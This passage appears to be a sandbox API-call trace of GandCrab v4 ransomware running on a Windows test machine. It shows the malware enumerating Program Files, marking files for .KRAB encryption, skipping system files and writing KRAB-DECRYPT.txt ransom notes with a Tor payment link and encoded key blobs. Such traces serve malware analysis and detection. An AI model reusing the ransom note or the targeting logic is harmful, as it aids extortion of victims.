jbkuK4dcgArE7p/ZEF5efpIhovrn/JleylI8aSPNqecB9NGmRzRYsl1yx7R79uHvMfZXs9u6R7v6sJyePFcv2fFnDq/8LyXgfBE9ECjLuiUlSkGewajMUrZ37SpbSW8OrKVHO/wBgi22J5C1kUjTYx7CQfDqZArf9qjhD5TjMiNMJUTOcANT1k8LdJCX5YnEkqbql9zAKGPD3h85JtJy5d5qZmc1qVDvNq4JgortqMJN+wJ1cbi0dC0ZupdUMXdEyil5EVrOYjd7OcK256OyLJexaPYNoLMT7nNQFQdBAdgxrP1A2j17iR9Rncy0lG27vyzvnlxBJHtN4rzwPyJcWjijdp+tPdfwpkuUhL1s780j4MPPa6ZSqrbN1dVzXyLYpgTfUJlmuliMYsyPoNF0wncUp6xOYOyeuFYcAYzh6kio0hS/OQfq9DULy4jlRsz4upLH/t6I4C2/8Dhtc9am+2z9kXRqxFGT2X4svMmQoZzcM7WuEljG+iZFnGvqeC8n5vHYUfpc5fDXIAr/3POwA8reJF9MuTQQ1Y71BT3fv8E7sTer0XVOuLq5R4mK7sEM2n3/s8Xg1stfLsHdFcp4Hmv7zJXtlAL+R4H9W/nSZPojs1+CA3f3LfcV0a7HpDCnE+3xAWSnFQ2gRJqfwbzuEDyyCVnlyuJ3gtkbgNzq9B1APP/reqFbD0NTG+Qbvjfy1WKWsuD6289ARnmzQdZfMJBKc6RFzabP8o+FTdQ528K5/LT7x00/WeKSnwRm9OwlEw+VgWABWgavtON3e6mnQGl0Ht3WD/SoiTiUQhaoEEUIhq2bMJGacz0QBGGZmiesqKc5BNYY47mlOBt90VgLBU4CrLlcekD1QKjwWIv7VZ/6d9hWbB8r/E0K0I3RLvsz5vWO2nXOYF4tjdvIFwTL7vhZLqD68CF4elxti9nkRp6gejjvBin0GKFE4sn+7ygICF6nm51nbjx2PCS9UqKQVB18bAq1wqNncQG3eriEdZiQnDmTTBJwZ6wxpzlzgiHPxH2MQl59eCy06ZlQ4pRy8AIZxYSs8MjywVkVMf5xfLKSSVC62MPhaeUAB6K7uhE53Kh/oFl2ty6x3FceOAGIk+6qZNV46mVnA0GY1UlOP7S+iVlY0LkPprvD5AwUQwkDA3J2EcOBy5zS0VDHF/IytPJedv/7il5EehJa3AjJJxYGvWERQaYZIUHY/zL8TGo2R8/ZR5MxJqHNldb8Qd8e6doJuxjxiJYrhGVvyhtJA622V6kMSz5u9Zt2BKOap2t+iec6qvzJ66awl54zVCYGCWnYUJ0Gr+HJQiCb+f9SsuUKy0pCXHEtL7hiZI7EOOMD7fkCREB/rydvt9VVgNLaxwvILFzP8c8FdqundPbfSwa3uorXdvHPZwzmxgXTCDqSdOEPl1K4/SIPmI5XHa0B26K6PumAdOtmc=\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0041.448] WriteFile (in: hFile=0x28c, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338f720, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338f720*=0x1f6e, lpOverlapped=0x0) returned 1 [0041.449] CloseHandle (hObject=0x28c) returned 1 [0041.449] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.450] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0041.450] GetSystemTime (in: lpSystemTime=0x3030400 | out: lpSystemTime=0x3030400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2c, wSecond=0x30, wMilliseconds=0x28c)) [0041.450] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x3040000 [0041.450] GetWindowsDirectoryW (in: lpBuffer=0x3040000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0041.450] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x3040200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x3040600, lpMaximumComponentLength=0x3040608, lpFileSystemFlags=0x3040604, lpFileSystemNameBuffer=0x3040400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x3040600*=0xd2ca4def, lpMaximumComponentLength=0x3040608*=0xff, lpFileSystemFlags=0x3040604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0041.450] wsprintfW (in: param_1=0x3030000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Program Files (x86)\\d2ca4a08d2ca4dee3d.lock") returned 46 [0041.450] CreateFileW (lpFileName="C:\\Program Files (x86)\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\program files (x86)\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x28c [0041.453] VirtualFree (lpAddress=0x3040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.453] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.454] lstrlenW (lpString="C:\\Program Files (x86)\\") returned 23 [0041.454] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="*" | out: lpString1="C:\\Program Files (x86)\\*") returned="C:\\Program Files (x86)\\*" [0041.454] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\*", lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 0xf8a4c8 [0041.454] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0041.454] FindNextFileW (in: hFindFile=0xf8a4c8, lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 1 [0041.454] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0041.454] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0041.454] FindNextFileW (in: hFindFile=0xf8a4c8, lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 1 [0041.454] lstrcmpW (lpString1="Adobe", lpString2=".") returned 1 [0041.454] lstrcmpW (lpString1="Adobe", lpString2="..") returned 1 [0041.454] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="Adobe" | out: lpString1="C:\\Program Files (x86)\\Adobe") returned="C:\\Program Files (x86)\\Adobe" [0041.454] FindNextFileW (in: hFindFile=0xf8a4c8, lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 1 [0041.454] lstrcmpW (lpString1="Common Files", lpString2=".") returned 1 [0041.454] lstrcmpW (lpString1="Common Files", lpString2="..") returned 1 [0041.454] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="Common Files" | out: lpString1="C:\\Program Files (x86)\\Common Files") returned="C:\\Program Files (x86)\\Common Files" [0041.454] FindNextFileW (in: hFindFile=0xf8a4c8, lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 1 [0041.454] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0041.454] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0041.454] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Program Files (x86)\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Program Files (x86)\\d2ca4a08d2ca4dee3d.lock" [0041.454] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0041.454] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\Program Files (x86)\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 51 [0041.455] lstrlenW (lpString="C:\\Program Files (x86)\\d2ca4a08d2ca4dee3d.lock") returned 46 [0041.455] lstrlenW (lpString=".lock") returned 5 [0041.455] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3040000 [0041.455] wsprintfW (in: param_1=0x3040000, param_2="%s " | out: param_1=".lock ") returned 6 [0041.455] VirtualFree (lpAddress=0x3040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.455] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.455] FindNextFileW (in: hFindFile=0xf8a4c8, lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 1 [0041.455] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0041.455] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0041.455] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="desktop.ini" | out: lpString1="C:\\Program Files (x86)\\desktop.ini") returned="C:\\Program Files (x86)\\desktop.ini" [0041.455] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0041.456] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\Program Files (x86)\\desktop.ini.KRAB") returned 39 [0041.456] lstrlenW (lpString="C:\\Program Files (x86)\\desktop.ini") returned 34 [0041.456] lstrlenW (lpString=".ini") returned 4 [0041.456] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x3040000 [0041.456] wsprintfW (in: param_1=0x3040000, param_2="%s " | out: param_1=".ini ") returned 5 [0041.456] VirtualFree (lpAddress=0x3040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.456] lstrlenW (lpString="C:\\Program Files (x86)\\desktop.ini") returned 34 [0041.456] lstrlenW (lpString="C:\\Program Files (x86)\\desktop.ini") returned 34 [0041.456] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0041.456] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.456] FindNextFileW (in: hFindFile=0xf8a4c8, lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 1 [0041.456] lstrcmpW (lpString1="Google", lpString2=".") returned 1 [0041.456] lstrcmpW (lpString1="Google", lpString2="..") returned 1 [0041.456] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="Google" | out: lpString1="C:\\Program Files (x86)\\Google") returned="C:\\Program Files (x86)\\Google" [0041.456] FindNextFileW (in: hFindFile=0xf8a4c8, lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 1 [0041.456] lstrcmpW (lpString1="Internet Explorer", lpString2=".") returned 1 [0041.456] lstrcmpW (lpString1="Internet Explorer", lpString2="..") returned 1 [0041.456] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="Internet Explorer" | out: lpString1="C:\\Program Files (x86)\\Internet Explorer") returned="C:\\Program Files (x86)\\Internet Explorer" [0041.457] FindNextFileW (in: hFindFile=0xf8a4c8, lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 1 [0041.457] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0041.457] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0041.457] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Program Files (x86)\\KRAB-DECRYPT.txt") returned="C:\\Program Files (x86)\\KRAB-DECRYPT.txt" [0041.457] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0041.457] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\Program Files (x86)\\KRAB-DECRYPT.txt.KRAB") returned 44 [0041.457] lstrlenW (lpString="C:\\Program Files (x86)\\KRAB-DECRYPT.txt") returned 39 [0041.457] lstrlenW (lpString=".txt") returned 4 [0041.457] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x3040000 [0041.457] wsprintfW (in: param_1=0x3040000, param_2="%s " | out: param_1=".txt ") returned 5 [0041.457] VirtualFree (lpAddress=0x3040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.457] lstrlenW (lpString="C:\\Program Files (x86)\\KRAB-DECRYPT.txt") returned 39 [0041.457] lstrlenW (lpString="C:\\Program Files (x86)\\KRAB-DECRYPT.txt") returned 39 [0041.457] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0041.457] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0041.457] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0041.457] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0041.457] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0041.458] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0041.458] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0041.458] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0041.458] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0041.458] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0041.458] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.458] FindNextFileW (in: hFindFile=0xf8a4c8, lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 1 [0041.458] lstrcmpW (lpString1="Microsoft.NET", lpString2=".") returned 1 [0041.458] lstrcmpW (lpString1="Microsoft.NET", lpString2="..") returned 1 [0041.458] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="Microsoft.NET" | out: lpString1="C:\\Program Files (x86)\\Microsoft.NET") returned="C:\\Program Files (x86)\\Microsoft.NET" [0041.458] FindNextFileW (in: hFindFile=0xf8a4c8, lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 1 [0041.458] lstrcmpW (lpString1="Mozilla Firefox", lpString2=".") returned 1 [0041.458] lstrcmpW (lpString1="Mozilla Firefox", lpString2="..") returned 1 [0041.458] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="Mozilla Firefox" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox") returned="C:\\Program Files (x86)\\Mozilla Firefox" [0041.458] FindNextFileW (in: hFindFile=0xf8a4c8, lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 1 [0041.458] lstrcmpW (lpString1="Mozilla Maintenance Service", lpString2=".") returned 1 [0041.458] lstrcmpW (lpString1="Mozilla Maintenance Service", lpString2="..") returned 1 [0041.458] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="Mozilla Maintenance Service" | out: lpString1="C:\\Program Files (x86)\\Mozilla Maintenance Service") returned="C:\\Program Files (x86)\\Mozilla Maintenance Service" [0041.458] FindNextFileW (in: hFindFile=0xf8a4c8, lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 1 [0041.458] lstrcmpW (lpString1="MSBuild", lpString2=".") returned 1 [0041.458] lstrcmpW (lpString1="MSBuild", lpString2="..") returned 1 [0041.458] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="MSBuild" | out: lpString1="C:\\Program Files (x86)\\MSBuild") returned="C:\\Program Files (x86)\\MSBuild" [0041.458] FindNextFileW (in: hFindFile=0xf8a4c8, lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 1 [0041.458] lstrcmpW (lpString1="Reference Assemblies", lpString2=".") returned 1 [0041.458] lstrcmpW (lpString1="Reference Assemblies", lpString2="..") returned 1 [0041.458] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="Reference Assemblies" | out: lpString1="C:\\Program Files (x86)\\Reference Assemblies") returned="C:\\Program Files (x86)\\Reference Assemblies" [0041.458] FindNextFileW (in: hFindFile=0xf8a4c8, lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 1 [0041.458] lstrcmpW (lpString1="Windows Defender", lpString2=".") returned 1 [0041.458] lstrcmpW (lpString1="Windows Defender", lpString2="..") returned 1 [0041.458] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="Windows Defender" | out: lpString1="C:\\Program Files (x86)\\Windows Defender") returned="C:\\Program Files (x86)\\Windows Defender" [0041.458] FindNextFileW (in: hFindFile=0xf8a4c8, lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 1 [0041.458] lstrcmpW (lpString1="Windows Mail", lpString2=".") returned 1 [0041.458] lstrcmpW (lpString1="Windows Mail", lpString2="..") returned 1 [0041.458] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="Windows Mail" | out: lpString1="C:\\Program Files (x86)\\Windows Mail") returned="C:\\Program Files (x86)\\Windows Mail" [0041.459] FindNextFileW (in: hFindFile=0xf8a4c8, lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 1 [0041.459] lstrcmpW (lpString1="Windows Media Player", lpString2=".") returned 1 [0041.459] lstrcmpW (lpString1="Windows Media Player", lpString2="..") returned 1 [0041.459] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="Windows Media Player" | out: lpString1="C:\\Program Files (x86)\\Windows Media Player") returned="C:\\Program Files (x86)\\Windows Media Player" [0041.459] FindNextFileW (in: hFindFile=0xf8a4c8, lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 1 [0041.459] lstrcmpW (lpString1="Windows Multimedia Platform", lpString2=".") returned 1 [0041.459] lstrcmpW (lpString1="Windows Multimedia Platform", lpString2="..") returned 1 [0041.459] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="Windows Multimedia Platform" | out: lpString1="C:\\Program Files (x86)\\Windows Multimedia Platform") returned="C:\\Program Files (x86)\\Windows Multimedia Platform" [0041.459] FindNextFileW (in: hFindFile=0xf8a4c8, lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 1 [0041.459] lstrcmpW (lpString1="Windows NT", lpString2=".") returned 1 [0041.459] lstrcmpW (lpString1="Windows NT", lpString2="..") returned 1 [0041.459] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="Windows NT" | out: lpString1="C:\\Program Files (x86)\\Windows NT") returned="C:\\Program Files (x86)\\Windows NT" [0041.459] FindNextFileW (in: hFindFile=0xf8a4c8, lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 1 [0041.459] lstrcmpW (lpString1="Windows Photo Viewer", lpString2=".") returned 1 [0041.459] lstrcmpW (lpString1="Windows Photo Viewer", lpString2="..") returned 1 [0041.459] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="Windows Photo Viewer" | out: lpString1="C:\\Program Files (x86)\\Windows Photo Viewer") returned="C:\\Program Files (x86)\\Windows Photo Viewer" [0041.459] FindNextFileW (in: hFindFile=0xf8a4c8, lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 1 [0041.459] lstrcmpW (lpString1="Windows Portable Devices", lpString2=".") returned 1 [0041.459] lstrcmpW (lpString1="Windows Portable Devices", lpString2="..") returned 1 [0041.459] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="Windows Portable Devices" | out: lpString1="C:\\Program Files (x86)\\Windows Portable Devices") returned="C:\\Program Files (x86)\\Windows Portable Devices" [0041.459] FindNextFileW (in: hFindFile=0xf8a4c8, lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 1 [0041.459] lstrcmpW (lpString1="Windows Sidebar", lpString2=".") returned 1 [0041.459] lstrcmpW (lpString1="Windows Sidebar", lpString2="..") returned 1 [0041.459] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="Windows Sidebar" | out: lpString1="C:\\Program Files (x86)\\Windows Sidebar") returned="C:\\Program Files (x86)\\Windows Sidebar" [0041.459] FindNextFileW (in: hFindFile=0xf8a4c8, lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 1 [0041.459] lstrcmpW (lpString1="WindowsPowerShell", lpString2=".") returned 1 [0041.459] lstrcmpW (lpString1="WindowsPowerShell", lpString2="..") returned 1 [0041.459] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="WindowsPowerShell" | out: lpString1="C:\\Program Files (x86)\\WindowsPowerShell") returned="C:\\Program Files (x86)\\WindowsPowerShell" [0041.459] FindNextFileW (in: hFindFile=0xf8a4c8, lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 0 [0041.459] FindClose (in: hFindFile=0xf8a4c8 | out: hFindFile=0xf8a4c8) returned 1 [0041.459] CloseHandle (hObject=0x28c) returned 1 [0041.460] FindNextFileW (in: hFindFile=0xf8a188, lpFindFileData=0x338f9d0 | out: lpFindFileData=0x338f9d0) returned 1 [0041.460] lstrcmpW (lpString1="ProgramData", lpString2=".") returned 1 [0041.460] lstrcmpW (lpString1="ProgramData", lpString2="..") returned 1 [0041.460] lstrcatW (in: lpString1="C:\\", lpString2="ProgramData" | out: lpString1="C:\\ProgramData") returned="C:\\ProgramData" [0041.460] lstrcatW (in: lpString1="C:\\ProgramData", lpString2="\\" | out: lpString1="C:\\ProgramData\\") returned="C:\\ProgramData\\" [0041.460] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0041.460] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.460] FindNextFileW (in: hFindFile=0xf8a188, lpFindFileData=0x338f9d0 | out: lpFindFileData=0x338f9d0) returned 1 [0041.460] lstrcmpW (lpString1="Recovery", lpString2=".") returned 1 [0041.460] lstrcmpW (lpString1="Recovery", lpString2="..") returned 1 [0041.460] lstrcatW (in: lpString1="C:\\", lpString2="Recovery" | out: lpString1="C:\\Recovery") returned="C:\\Recovery" [0041.460] lstrcatW (in: lpString1="C:\\Recovery", lpString2="\\" | out: lpString1="C:\\Recovery\\") returned="C:\\Recovery\\" [0041.460] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0041.460] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0041.460] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0041.461] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0041.461] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0041.461] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.461] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0041.461] wsprintfW (in: param_1=0x3030200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Recovery\\\\KRAB-DECRYPT.txt") returned 29 [0041.461] CreateFileW (lpFileName="C:\\Recovery\\\\KRAB-DECRYPT.txt" (normalized: "c:\\recovery\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0041.465] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\nlAQAAHPTUHGrjb/dcqUrzDS2xomeC8P4CUSPNAOL+0Mo/RbLr0OaWU1FJb00XfFHXj6tOuf3fPEItNktL2VhtINGOMGKEAUgRHIwxSGaKwcSkEjDUL0HUwplREArY2eQK/2FlKmtVxY2cgAjLoWFXtwo2gEK4a1eyVpOdA/5PKA19vmu9D7IWlFZ8M2v2HcmX1WFwMSKKyCPyE3I12HtIyga2yppmGj/0kbeo4Pyss0DfwD9qQhlmbNwHCOobnSofdvP3cINJt0T+mj6E/gguxJb77VutzLS7ATQylX2An2d2MzGDkSiNzUWV0yDTYzmL5WDSsSyVbWoOteqpx5W43Cfpby5H7iD4Mk5vDzBWPVFeBH4GhKSNudNQl6iOb1l4eeUMuEBXGw0+BpkUrUAgQjBWLbJ6CleUr6MmODOH6A7Jhf60sNPZMijoWaqeecabt0KEf7vwtAKjxeXkDnboIObW61GiYye3Y4Tx1l6X4ZFSnOs4j5jePpy6IWD50Buvy4RFZAKh09rDrTVp5PPV5K0wx5ROUVxEFDMbKemGWn2kbJiiMXWKf9il9ecR7Vj6B9X2QxCxUUzPoOCetcS51SFmTzpNC24BpHiYhlhwBirS7mEqg9eHAs2+76DlthH0IYBlLrEZfZyF2GmyxnNSuiRvf66muc7RQYfG3jxGAECcWKNLqKv8fvy6Z8TXe6Wy3TAJ9Bs4xTAPNS0SMF465Ku6H3cEM/+Sga6KajwZhU3AgixnVgyRE321c0dFCBWzWXYlI72JWaaZIHuktcbpqOdgIM0s1zRRiik4jAuC9jbkuK4dcgArE7p/ZEF5efpIhovrn/JleylI8aSPNqecB9NGmRzRYsl1yx7R79uHvMfZXs9u6R7v6sJyePFcv2fFnDq/8LyXgfBE9ECjLuiUlSkGewajMUrZ37SpbSW8OrKVHO/wBgi22J5C1kUjTYx7CQfDqZArf9qjhD5TjMiNMJUTOcANT1k8LdJCX5YnEkqbql9zAKGPD3h85JtJy5d5qZmc1qVDvNq4JgortqMJN+wJ1cbi0dC0ZupdUMXdEyil5EVrOYjd7OcK256OyLJexaPYNoLMT7nNQFQdBAdgxrP1A2j17iR9Rncy0lG27vyzvnlxBJHtN4rzwPyJcWjijdp+tPdfwpkuUhL1s780j4MPPa6ZSqrbN1dVzXyLYpgTfUJlmuliMYsyPoNF0wncUp6xOYOyeuFYcAYzh6kio0hS/OQfq9DULy4jlRsz4upLH/t6I4C2/8Dhtc9am+2z9kXRqxFGT2X4svMmQoZzcM7WuEljG+iZFnGvqeC8n5vHYUfpc5fDXIAr/3POwA8reJF9MuTQQ1Y71BT3fv8E7sTer0XVOuLq5R4mK7sEM2n3/s8Xg1stfLsHdFcp4Hmv7zJXtlAL+R4H9W/nSZPojs1+CA3f3LfcV0a7HpDCnE+3xAWSnFQ2gRJqfwbzuEDyyCVnlyuJ3gtkbgNzq9B1APP/reqFbD0NTG+Qbvjfy1WKWsuD6289ARnmzQdZfMJBKc6RFzabP8o+FTdQ528K5/LT7x00/WeKSnwRm9OwlEw+VgWABWgavtON3e6mnQGl0Ht3WD/SoiTiUQhaoEEUIhq2bMJGacz0QBGGZmiesqKc5BNYY47mlOBt90VgLBU4CrLlcekD1QKjwWIv7VZ/6d9hWbB8r/E0K0I3RLvsz5vWO2nXOYF4tjdvIFwTL7vhZLqD68CF4elxti9nkRp6gejjvBin0GKFE4sn+7ygICF6nm51nbjx2PCS9UqKQVB18bAq1wqNncQG3eriEdZiQnDmTTBJwZ6wxpzlzgiHPxH2MQl59eCy06ZlQ4pRy8AIZxYSs8MjywVkVMf5xfLKSSVC62MPhaeUAB6K7uhE53Kh/oFl2ty6x3FceOAGIk+6qZNV46mVnA0GY1UlOP7S+iVlY0LkPprvD5AwUQwkDA3J2EcOBy5zS0VDHF/IytPJedv/7il5EehJa3AjJJxYGvWERQaYZIUHY/